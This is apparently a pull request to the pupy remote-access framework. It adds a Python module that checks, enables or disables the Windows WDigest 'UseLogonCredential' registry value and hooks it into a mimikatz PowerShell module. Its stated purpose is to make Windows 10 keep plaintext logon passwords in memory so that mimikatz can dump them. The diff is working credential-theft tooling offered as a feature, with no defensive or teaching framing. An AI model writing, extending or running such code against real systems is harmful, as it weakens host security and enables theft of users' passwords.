### PR TITLE
Manage wdigest key

### DIFF
--- a/pupy/modules/mimikatz_powershell.py
+++ b/pupy/modules/mimikatz_powershell.py
@@ -4,7 +4,6 @@ import os
 import re
 from modules.lib.windows.powershell_upload import execute_powershell_script
 from pupylib.utils.credentials import Credentials
-from pupylib.utils.rpyc_utils import redirected_stdio
 
 __class_name__="Mimikatz_Powershell"
 ROOT=os.path.abspath(os.path.join(os.path.dirname(__file__),".."))
@@ -32,12 +31,11 @@ Invoke-Mimikatz -Command "privilege::debug exit" -ComputerName "computer1"
         # for windows 10, if the UseLogonCredential registry is not present or disable (equal to 0), not plaintext password can be retrieved using mimikatz.
         if args.wdigest:
             self.client.load_package("pupwinutils.wdigest")
-            with redirected_stdio(self.client.conn):
-                ok, message = self.client.conn.modules["pupwinutils.wdigest"].wdigest(args.wdigest)
-                if ok: 
-                    self.success(message)
-                else:
-                    self.warning(str(message))
+            ok, message = self.client.conn.modules["pupwinutils.wdigest"].wdigest(args.wdigest)
+            if ok: 
+                self.success(message)
+            else:
+                self.warning(str(message))
             return
 
         script ='mimikatz'

--- a/pupy/packages/windows/all/pupwinutils/wdigest.py
+++ b/pupy/packages/windows/all/pupwinutils/wdigest.py
@@ -1,0 +1,45 @@
+from _winreg import *
+
+
+def modifyKey(keyPath, regPath, value, root=HKEY_LOCAL_MACHINE):
+	aReg = ConnectRegistry(None, root)
+
+	try:
+		aKey = OpenKey(aReg, keyPath, 0, KEY_WRITE)
+		SetValueEx(aKey, regPath, 0, REG_DWORD, value)
+		CloseKey(aKey)
+	except Exception, e:
+		return False, e
+
+	return True, ''
+
+
+def queryValue(keyPath, regPath, root=HKEY_LOCAL_MACHINE):
+	aReg = ConnectRegistry(None, root)
+	try:
+		aKey = OpenKey(aReg, keyPath, 0, KEY_READ)
+		value = QueryValueEx(aKey, regPath)
+		CloseKey(aKey)
+		if value[0] == 0:
+			return False, 'UseLogonCredential disabled'
+		else:
+			return True, 'UseLogonCredential already enabled'
+	except:
+		return False, 'UseLogonCredential key not found, you should create it'
+
+def wdigest(action):
+	key_path = r"SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest\\"
+	key_name = 'UseLogonCredential'
+
+	if action == 'check':
+		return queryValue(key_path, key_name)
+	elif action == 'enable':
+		ok, message =  modifyKey(key_path, key_name, 1)
+		if ok: 
+			message = 'UseLogonCredential key created, logoff the user session to dump plaintext credentials'
+		return ok, message
+	elif action == 'disable':
+		ok, message =  modifyKey(key_path, key_name, 0)
+		if ok: 
+			message = 'UseLogonCredential key deleted'
+		return ok, message


### PR DESCRIPTION
For windows 10, if the UseLogonCredential registry is not present or it's disabled (equal to 0), not plaintext passwords can be retrieved using mimikatz. 
So I added an option on mimikatz to allow the user to enable / disable or check the value of this registry key. 